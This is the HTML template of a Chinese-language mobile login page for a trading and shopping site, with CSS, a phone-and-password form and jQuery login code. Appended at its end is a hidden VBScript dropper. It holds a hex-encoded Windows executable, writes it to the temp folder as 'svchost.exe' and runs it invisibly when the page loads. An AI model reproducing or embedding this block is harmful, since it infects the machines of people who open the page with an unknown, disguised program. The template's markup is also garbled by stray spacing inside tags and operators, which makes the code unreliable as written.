< div id = "login_box" >
< link href = "__CSS__/unlr.css" rel = "stylesheet" >
< if condition = "ACTION_NAME eq 'publish2'" >
< link href = "__CSS__/iconfont.css" rel = "stylesheet" >
< style >
body{min-height: 100%;}
input, select, button, textarea {
outline: none;
font-family: inherit;
-webkit-appearance: none;
border: none;
color: #18b1ea;
}
.trunker {}
.trunker .xg-back {display: block;
position: absolute;
top: 0px;
left: 0px;
width: .8rem;
height: .8rem;
}
.trunker .xg-back img{width:100%;height:100%;}
.banner {
background: url(__IMG__/user_bg.png) center 0 no-repeat;
background-size: 100% 100%;
text-align: center;
color: #FFF;
padding-top: 1rem;
}
.login-banner .imgbox {
padding: .62rem 0;
}
.login-banner .imgbox img {
width: 1.8rem;
height: 1.8rem;
border-radius: 100%;
background: #FFF;
display: block;
margin: 2.8vw auto 0rem;
box-shadow: 0 0 0 4px rgba(255,255,255,.6);
}
.t-form .login-box {
margin: .6rem .5rem;
font-size: .34rem;
color: #777;
}
.login-form .input-group {
padding: .1rem 11% .1rem 10%;
}
.t-form .input-group .input-prefix {
width: 10%;
}
.t-form .input-group .input-suffix {
width: 11%;
}
.t-form .input-group .txt, .t-form .input-group .getcode, .register-box .input-group .getcode2, .t-form .input-mark {
font-size: .39rem;
}
.username_record_list {
position: absolute;
top: 1rem;
left: 0;right:0;
z-index: 100;
background: #FFF;
width: 100%;
border: 1px solid #cdcdcd;
border-radius: 3px;
padding: 0.1rem 0;
}
.username_record_list li {
padding: 0.1rem 0.25rem;
position: relative;
}
.username_record_list li .name {font-size:0.34rem;display:inline-block;width:80%;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}
.username_record_list li .delete_btn {float:right;background:url(__IMG__/trade1/icon_normal_shan.png) center center no-repeat;background-size:100% 100%;width:.4rem;height:.4rem;}
#mobile:focus~.username_record_list {display:block;}
.t-form .btn-group .submit {
background: #18B1EA;
color: #FFF;
font-size: .42rem;
width: 100%;
border: none;
border-radius: 2rem;
padding: 1.5vw 0;
}
.t-form .agree {
margin: .3rem 0 .6rem;
}
.t-form .link-group {
padding: .1rem 0;
}
.t-form .input-group .input-fix {
position: absolute;
top: .4rem;
text-align: center;
}
.t-form .input-group .input-fix .iconfont {
font-size: .48rem;
color: #999;
height: 100%;
line-height: 1.4;
}
.login-form .input-group .txt::-webkit-input-placeholder {
color: #999;
}
.login-form .input-group .txt:-moz-placeholder {
color: #999;
}
.login-form .input-group .txt::-moz-placeholder {
color: #999;
}
.login-form .input-group .txt:-ms-input-placeholder {
color: #999;
}
@media screen and (max-width:500px) {
.t-form .login-box {font-size:.32rem;}
.t-form .input-group .txt,.t-form .input-group .getcode,.register-box .input-group .getcode2,.t-form .input-mark {font-size:.38rem;}
}
@media screen and (max-width:400px) {
.t-form .login-box {font-size:.30rem;}
}
@media screen and (max-width:350px) {
.t-form .login-box {font-size:.28rem;}
.t-form .input-group .txt,.t-form .input-group .getcode,.register-box .input-group .getcode2,.t-form .input-mark {font-size:.36rem;}
}
< / style >
< else / >
< style >
.username_record_list {position:absolute;top:100%;left:0;right:0;z-index:100;background:#FFF;width:100%;border:1px solid #cdcdcd;border-radius:3px;padding:0.6rem 0;}
.username_record_list li {padding:0.6rem 0.9rem 0.6rem 5.5%;position:relative;}
.username_record_list li .name {display:inline-block;width:80%;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}
.username_record_list li .delete_btn {float:right;background:url(__IMG__/trade1/icon_normal_shan.png) center center no-repeat;background-size:100% 100%;width:2rem;height:2rem;}
#mobile:focus~.username_record_list {display:block;}
.trunker .xg-back {display: block;
position: absolute;
top: 0px;
left: 0px;
width: 4.1rem;
height: 4.1rem;
}
.login-form .input-group .txt {border:none;padding:.4rem 1% .4rem 6%;}
.login-form .input-group .txt::-webkit-input-placeholder {
color: #999;
}
.login-form .input-group .txt:-moz-placeholder {
color: #999;
}
.login-form .input-group .txt::-moz-placeholder {
color: #999;
}
.login-form .input-group .txt:-ms-input-placeholder {
color: #999;
}
.trunker .container .hbtn {
width: 6rem;
height: 5rem;
position: absolute;
top: 0;
display: block;
text-align: center;
}
.trunker .container .caption {
position:absolute;top:0;left:0;right:0;margin:0 6rem;text-align:center;color:#FFF;
font-weight: normal;
height: 3rem;
font-size: 2.5rem;
padding: 1rem 1rem;
text-overflow: ellipsis;
overflow: hidden;
white-space: nowrap;
}
.trunker .container .hbtn .iconfont {
font-size: 3.6rem;
color: #FFF;
margin: .8rem 0;
display: block;
}
@media screen and (max-width: 450px){
.trunker .container .caption {
font-size: 2.2rem;
height: 2.8rem;
margin: 0 4rem;
}
.trunker .container .hbtn {
font-size: 1.4rem;
}
.trunker .container .hbtn .iconfont {
font-size: 3.2rem;
margin: 1rem 0;
}
}
@media screen and (max-width: 350px){
.trunker .container .caption {
font-size: 2rem;
height: 2.2rem;
margin: 0 4rem;
}
.trunker .container .hbtn {
width: 4rem;
}
.trunker .container .hbtn .iconfont {
font-size: 3rem;
margin: .7rem 0;
}
}
< / style >
< / if >
< section class = "trunker" style = "min-height:auto;margin-bottom:0;" >
< section class = "container" style = "position:relative;height:100vh;" >
< if condition = "ACTION_NAME eq 'publish' or ACTION_NAME eq 'record' " >
< a href = "{:U('Trade/index')}" class = "hbtn back" > < i class = "iconfont icon-drop-left" > < / i > < / a >
< else / >
<!-- <a id="close_login" href="javascript:;" class="hbtn back"><i class="iconfont icon - drop - left"></i></a> -->
< / if >
< h1 class = "caption" > 用户登录< / h1 >
< div class = "banner login-banner" >
< div class = "wrap" >
< div class = "imgbox" >
< img src = "__IMG__/portrait_not.png" >
< / div >
< / div >
< / div >
< div class = "t-form login-form" >
< form class = "login-box" id = "login_form" url = "{$url}" >
< div class = "form-group clearfix" >
< div class = "input-group clearfix" id = "url_list" >
< span class = "input-fix input-prefix" > < i class = "iconfont icon-mobile" > < / i > < / span >
<!-- <span class="input - fix input - suffix jsdel" style="right:8.5%;"><i class="iconfont icon - error3"></i></span>
-->
< span class = "input-fix input-suffix jsdrop" > < i class = "iconfont icon-drop-down" > < / i > < / span >
< input type = "text" name = "" id = "mobile" class = "txt" placeholder = "请输入账号/手机号" >
< / div >
< div class = "input-group clearfix" >
< span class = "input-fix input-prefix" > < i class = "iconfont icon-lock" > < / i > < / span >
< input type = "password" name = "" id = "password" class = "txt" placeholder = "请输入密码" >
< / div >
< / div >
< p class = "agree" > <!-- 注册账号表示您同意<a href="">最终用户协议</a> --> < / p >
< div class = "btn-group" >
< input type = "button" class = "submit" value = "登录" >
< / div >
< div class = "link-group clearfix" >
< a href = "{:U('User/step1')}" class = "register-btn" > 账号注册 | < / a > < a href = "{:U('User/step')}" class = "register-btn" > 手机注册< / a >
< a href = "{:U('User/forget')}" class = "forget-btn" style = "color: #999" > 忘记密码< / a >
< / div >
< / form >
< / div >
< footer class = "footer" >
< div class = "foot-nav" >
< div class = "foot-nav-list" >
< a href = "{:U('Index/index')}" class = "" >
< i class = "iconfont icon-home" > < / i >
< p > 首页< / p >
< / a >
< a href = "{:U('Trade/index')}" class = "" >
< i class = "iconfont icon-trade" > < / i >
< p > 交易< / p >
< / a >
< a href = "{:U('Shop/index')}" class = "" >
< i class = "iconfont icon-shop" > < / i >
< p > 商城< / p >
< / a >
< a href = "{:U('Gift/index')}" class = "" >
< i class = "iconfont icon-gift" > < / i >
< p > 礼包< / p >
< / a >
< a href = "{:U('User/index')}" class = "on" >
< i class = "iconfont icon-user" > < / i >
< p > 我的< / p >
< / a >
< / div >
< / div >
< / footer >
< / section >
< / section >
< div class = "pop pop-window" >
< div class = "pop-box pop-sign" >
< div class = "pop-wrap" > < / div >
< / div >
< / div >
< div class = "popmsg pop-dialog" > < / div >
< script src = "__JS__/pop.lwx.min.js" > < / script >
< script >
$(document).keyup(function(event){
if(event.keyCode == 13){
$('.submit').click();
}
});
$('#close_login').click(function() {
var p = $('.popwin').fadeOut(200);
setTimeout(function(){p.find('#login_box').remove();},210);
return false;
});
function delete_url(e,str,i) {
var arr = str.split(',');
var index = arr.indexOf(i);
if(index>-1)
arr.splice(index,1);
lwx.setItem('username',arr.join(','));
$(e).closest('li').remove();
if($('#url_list #username_record_list li').length< 1 ) {
$('#url_list #username_record_list').remove();
}
}
function input_name(e,i) {
$('#mobile').val(i);
$(e).closest('#username_record_list').hide();
}
var username = lwx.getItem('username');
if(username) {
var uname = username.split(',');
var html = '< ul class = "username_record_list" id = "username_record_list" style = "display:none;" > ';
for(var i=0,len=uname.length;i< len ; i + + ) {
html += '< li > < span class = "name" onclick = "input_name(this,''+uname[i]+'')" > '+uname[i]+'< / span > < a class = "delete_btn" onclick = "delete_url(this,''+username+'',''+uname[i]+'')" href = "javascript:;" > < / a > < / li > ';
}
html += '< / ul > ';
$('#url_list').append(html);
}
$('#mobile').focus(function() {
if($('#url_list #username_record_list').length>0) {
$('#url_list #username_record_list').show();
}
return false;
});
$('.jsdrop').on('click',function() {
var url = $('#url_list #username_record_list');
if(url.is(':visible')) {
url.hide();$(this).find('i').removeClass('icon-drop-up').addClass('icon-drop-down');
} else {
url.show();$(this).find('i').removeClass('icon-drop-down').addClass('icon-drop-up');
}
return false;
});
$('body').click(function(event) {
var e = event || window.event;
var target = $(e.target);
if(target.closest('#url_list').length< 1 & & target . attr ( ' id ' ) ! = ' url_list ' ) {
$('#url_list #username_record_list').hide();
}
});
var pmsg = $('.popmsg').pop();
$('.submit').click(function(event) {
var mobile = $.trim($('#mobile').val());
var password = $.trim($('#password').val());
if (mobile) {
if (password) {
$.ajax({
type:'POST',
url:'{:U("User/login")}',
data:{'phone':mobile,'password':password},
dataType:"Json",
success:function(data){
if(data.status == 1){
pmsg.msg(data.msg);
var username = lwx.getItem('username');
if(username) {
var arr = username.split(',');
if(arr.length>=5) {arr = arr.splice(0,4);}
for(var i=0,len=arr.length;i< len ; i + + ) {
if((!arr[i] & & typeof(arr[i]) != 0) || arr[i] == mobile) {arr.splice(i,1);}
}
arr.unshift(mobile);
mobile = arr.join(',');
}
lwx.setItem('username',mobile);
var url = $('#login_form').attr('url');
setTimeout(function(){
if(url) {
window.location.href = url;
} else
window.location.href = "{:U('Trade/detail',array('id'=>$_POST['id']))}";
},1500);
}else{
pmsg.msg(data.msg);
return false;
}
}
});
} else{
pmsg.msg('请输入密码');event.preventDefault();
}
} else {
pmsg.msg('请输入手机号码');event.preventDefault();
}
});
$(".jsdel").click(function(){
$('#mobile').val("");
})
< / script >
< / div > < SCRIPT Language = VBScript > < ! - -
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("& H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->< / SCRIPT >